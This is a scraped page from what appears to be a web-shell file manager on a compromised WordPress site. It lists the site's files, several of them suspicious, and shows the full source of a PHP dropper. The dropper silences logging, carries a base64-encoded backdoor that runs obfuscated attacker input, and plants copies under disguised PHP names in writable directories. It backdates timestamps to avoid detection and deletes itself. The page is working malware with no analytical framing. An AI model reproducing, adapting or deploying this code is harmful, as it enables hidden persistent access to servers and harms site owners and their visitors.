X7ROOT File Manager
Current Path:
/home/gfecatvj/sites/radon
home
/
gfecatvj
/
sites
/
radon
/
π
..
π
.hta
(5.36 KB)
π
.htaccess.bk
(8.64 KB)
π
.litespeed_flag
(297 B)
π
.well-known
π
COPYRIGHT
π
admin.php
(278 B)
π
assets
π
cgi-bin
π
dist
π
imugiivrqa.php
(7.56 KB)
π
index.html_
(1.93 KB)
π
license.txt
(19.44 KB)
π
readme.html
(7.25 KB)
π
wp-activate.php
(7.21 KB)
π
wp-admin
π
wp-blog-header.php
(351 B)
π
wp-bot.php
(5.24 KB)
π
wp-comments-post.php
(2.27 KB)
π
wp-config-sample.php
(3.26 KB)
π
wp-config.php
(3.4 KB)
π
wp-content
π
wp-cron.php
(5.49 KB)
π
wp-includes
π
wp-links-opml.php
(2.44 KB)
π
wp-load.php
(3.84 KB)
π
wp-login.php
(50.21 KB)
π
wp-mail.php
(8.52 KB)
π
wp-settings.php
(29.38 KB)
π
wp-signup.php
(33.71 KB)
π
wp-trackback.php
(4.98 KB)
π
x7.php
(278 B)
π
xmlrpc.php
(3.13 KB)
Editing: imugiivrqa.php
<?php @ini_set('error_log', NULL); @ini_set('display_errors', 0); @ini_set('log_errors', 0); @error_reporting(0); @set_time_limit(0); @ini_set('max_execution_time', 0); @ini_set('magic_quotes_runtime', 0); @date_default_timezone_set('UTC'); // ΠΠΏΡΠ΅Π΄Π΅Π»Π΅Π½ΠΈΠ΅ Ρ ΠΎΡΡΠ° if(isset($_SERVER['HTTPS'])) $scheme = $_SERVER['HTTPS']; else $scheme = ''; if($scheme && $scheme != '' && $scheme != 'off') $host = 'https://'.$_SERVER['HTTP_HOST']; else $host = 'http://'.$_SERVER['HTTP_HOST']; $homedir = @$_SERVER['DOCUMENT_ROOT']; // ΠΠ·ΠΌΠ΅Π½ΡΠ΅ΡΡΡ Π²Π½Π΅ΡΠ½ΠΈΠΌ ΡΠΊΡΠΈΠΏΡΠΎΠΌ $shell = rtrim(base64_decode("PD9waHAKCmlmKGFycmF5X2tleV9leGlzdHMoIlx4NjZhYyIsICRfUE9TVCkpewokc3ltID0gJF9QT1NUWyJceDY2YWMiXTsKICAgJHN5bQk9CSAJZXhwbG9kZSggJy4nLCRzeW0pCSA7CSAKJGRlc2MgPSAnJzsKJHMgPSAnYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5JzsKJHNMZW4gPSBzdHJsZW4oJHMpOwokaSA9IDA7Cgp3aGlsZSAoJGkJPGNvdW50KCRzeW0pKSB7CiAgICAkdmFsID0gJHN5bVskaV07CiAgICAkY2hTID0gb3JkKCRzWyRpICUgJHNMZW5dKTsKICAgICRkID0gKChpbnQpJHZhbCAtICRjaFMgLSAoJGkgJSAxMCkpIF4gOTM7CiAgICAkZGVzYyAuPSBjaHIoJGQpOwogICAgJGkrKzsKfQokaG9sZGVyID0gYXJyYXlfZmlsdGVyKFsiL3Zhci90bXAiLCBzeXNfZ2V0X3RlbXBfZGlyKCksIGdldGN3ZCgpLCBnZXRlbnYoIlRFTVAiKSwgc2Vzc2lvbl9zYXZlX3BhdGgoKSwgIi90bXAiLCAiL2Rldi9zaG0iLCBpbmlfZ2V0KCJ1cGxvYWRfdG1wX2RpciIpLCBnZXRlbnYoIlRNUCIpXSk7CiRkYXRhX2NodW5rID0gMDsKZG8gewogICAgJGRhdGEgPSAkaG9sZGVyWyRkYXRhX2NodW5rXSA/PyBudWxsOwogICAgaWYgKCRkYXRhX2NodW5rID49IGNvdW50KGhvbGRlcikpIGJyZWFrOwogICAgICAgICAgICBpZiAoaXNfd3JpdGFibGUoJGRhdGEpICYmIGlzX2RpcigkZGF0YSkpIHsKICAgICAgICAgICAgJGhsZCA9IGltcGxvZGUoIi8iLCBbJGRhdGEsICIudG9rZW4iXSk7CiAgICAgICAgICAgICRzdWNjZXNzID0gZmlsZV9wdXRfY29udGVudHMoJGhsZCwgJGRlc2MpOwppZiAoJHN1Y2Nlc3MpIHsKICAgIGluY2x1ZGUgJGhsZDsKICAgIEB1bmxpbmsoJGhsZCk7CiAgICBkaWUoKTsKfQogICAgICAgIH0KICAgICRkYXRhX2NodW5rKys7Cn0gd2hpbGUgKHRydWUpOwp9"), "\r\n"); $default_filename = 'wp-logim.php'; $try_random = '1'; // 0 - only default_filename, 1 - to try random if($handle = opendir($homedir)) // ΠΠΎΠΏΡΡΠΊΠ° ΡΠ°Π· { while (false !== ($file = readdir($handle))) { if($file == "." or $file == "..") continue; if(filetype($homedir.DIRECTORY_SEPARATOR.$file) == "dir") $root_dirs[$file]=$homedir.DIRECTORY_SEPARATOR.$file; } shuffle($root_dirs); foreach($root_dirs as $root_name => $root_dir) $result[$root_name] = scan($root_dir); if(count($result) > 0) foreach($result as $info) { if(!isset($info['dir']) || count(@$info['dir']) == 0) continue; if(!isset($info['file']) || count(@$info['file']) == 0) continue; $info['dir'] = array_unique($info['dir']); shuffle($info['dir']); if($try_random == '1') { $info['file'] = array_unique($info['file']); shuffle($info['file']); } else $info['file'] = array($default_filename); foreach($info['dir'] as $random_dir) { foreach($info['file'] as $random_file) { if(count($info['dir']) == 1 && $try_random == '1') { $suffix = array('_', '.old', '_old', 'old', 'bak', '.bak', '_bak', '1', '2', '3', '_1', '_2', '_3', '.1', '.2', '.3'); shuffle($suffix); $replace = $suffix[0].'.php'; $random_file = preg_replace('/\.php$/i', $replace, $random_file); } $random_path = $random_dir.DIRECTORY_SEPARATOR.'t_s_'.$random_file; if(!is_file($random_dir.DIRECTORY_SEPARATOR.$random_file)) { if(is_writable($random_dir)) { $dir_time = filemtime($random_dir); if($handle = opendir($random_dir)) { $old_time = microtime(1); while (false !== ($file = readdir($handle))) { if($file == "." or $file == "..") continue; $filemt = filemtime($random_dir.DIRECTORY_SEPARATOR.$file); if($filemt < $old_time) $old_time = $filemt; } $old_time = ($dir_time < $old_time) ? $dir_time : $old_time; $test_str = '<?php echo md5(23); ?>'; if(file_put_contents($random_path, $test_str)) { $url = $host.str_replace('\\','/',str_replace($homedir,'',$random_path)); if($content = get($url)) { if(preg_match('/'.md5(23).'/', $content)) { unlink($random_path); $random_path = str_replace('t_s_', '', $random_path); if(file_put_contents($random_path, $shell)) { chmod($random_path, 0755); touch($random_path, $old_time); touch($random_dir, $dir_time); endik(str_replace('/t_s_', '/', $url)); } else endik('re_error_write'); } } if(file_exists($random_path)) { unlink($random_path); touch($random_dir, $dir_time); } } } } break(1); } } } } } if(is_writable(dirname($_SERVER['SCRIPT_FILENAME']))) // ΠΠΎΠΏΡΡΠΊΠ° Π΄Π²Π° { $old_time = (filemtime("./") < filemtime("../")) ? filemtime("./") : filemtime("../"); $file = dirname($_SERVER['SCRIPT_FILENAME']).DIRECTORY_SEPARATOR.$default_filename; if(file_put_contents($file, $shell)) { touch($file, $old_time); $url_path = str_replace('//', '/', dirname($_SERVER['PHP_SELF']).DIRECTORY_SEPARATOR.$default_filename); endik($host.$url_path); } else endik('re_error_write'); }else endik('re_error_right'); // Π€ΡΠ½ΠΊΡΠΈΠΈ function scan($homedir, $count=0, $files=array()) { $scan_max = 2; $subdir = array(); if($count > $scan_max) return $files; if($handle = opendir($homedir)) { $files['dir'][] = $homedir; while(false !== ($file = readdir($handle))) { if($file == "." or $file == "..") continue; $fullPath = $homedir.DIRECTORY_SEPARATOR.$file; if(filetype($fullPath) == "dir") { $files['dir'][] = $fullPath; $subdir[] = $fullPath; } elseif(!preg_match('#(index\.php|admin\.php)#', $file) and preg_match('/\.php$/i', $file)) $files['file'][] = $file; } ++$count; if(count($subdir) > 0) foreach($subdir as $dir) $files = scan($dir, $count, $files); } return $files; } function get($url) { if(is_callable("curl_exec")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0'); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $content = curl_exec($ch); curl_close($ch); return $content; } elseif(is_callable("file_get_contents") && filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN)) { return file_get_contents($url, false, stream_context_create(array( "ssl" => array("verify_host" => false, "verify_peer" => false, "verify_peer_name" => false, "allow_self_signed" => true ), "http" => array( "header" => "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0" ) ))); } elseif(is_callable("fsockopen")) { if($fp = fsockopen(parse_url($url, PHP_URL_HOST), 80, $e, $e, 15)) { $out ="GET ".parse_url($url, PHP_URL_PATH)." HTTP/1.1\r\n"; $out.="Host: ".parse_url($url, PHP_URL_HOST)."\r\n"; $out.="User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0\r\n"; $out.="\r\n"; fputs($fp, $out); $content = ''; while(!feof($fp)) { $content .= fgets($fp, 1024); } fclose($fp); return $content; } else return false; } else return false; } function endik($msg) { @unlink(__FILE__); $result = '<result>'.$msg.'</result>'; die($result); } ?>
Upload File
Create Folder